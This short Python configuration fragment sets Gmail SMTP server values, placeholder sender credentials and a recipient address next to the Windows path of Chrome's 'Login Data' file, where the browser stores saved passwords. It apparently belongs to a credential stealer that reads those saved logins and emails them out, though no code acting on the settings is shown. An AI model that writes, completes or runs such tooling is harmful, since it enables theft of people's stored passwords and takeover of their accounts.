SERVER_HOST = 'smtp.gmail.com'
SERVER_PORT = 587

FROM_EMAIL = 'YOUR_EMAIL'
FROM_PASSWORD = 'YOUR_PASSWORD'
TO_EMAIL = 'TO_EMAIL'

LOGIN_PATH = 'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'